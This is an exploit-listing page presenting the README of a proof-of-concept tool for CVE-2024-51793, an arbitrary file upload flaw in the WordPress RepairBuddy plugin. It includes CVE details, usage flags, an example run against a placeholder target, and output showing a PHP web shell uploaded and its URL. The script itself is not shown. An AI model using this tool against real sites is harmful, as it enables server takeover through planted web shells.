Exploit for Unrestricted Upload of File with Dangerous Type in Webfulcreations Computer Repair Shop CVE-2024-51793

Name: Exploit for Unrestricted Upload of File with Dangerous Type in Webfulcreations Computer Repair Shop CVE-2024-51793
Rating: 5 (149 reviews)

2025-03-24 | CVSS 10.0

## https://sploitus.com/exploit?id=11687EAC-8083-54F4-B50D-4B348035BFCD
# 🛡️ WordPress RepairBuddy Plugin Exploit

## 📜 CVE Information

**CVE-ID:** CVE-2024-51793  
**Published:** 2024-11-11  
**Updated:** 2024-11-11  
**Title:** WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability  
**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.

**CWE:**  
- [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)

**CVSS:**  
- **Score:** 10.0 (CRITICAL)
- **Version:** 3.1
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

## 📋 Description

This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.

## ⚙️ Requirements

- Python 3.x
- `requests` library (`pip install requests`)

## 🚀 Usage

```shell
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload
```

## 📖 Example

```shell
python 
CVE-2024-51793.py -u http://target.com/wordpress
```

## 📝 Output

```text
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
```

## 👨‍💻 Author

Exploit By: Nxploited, Khaled Alenazi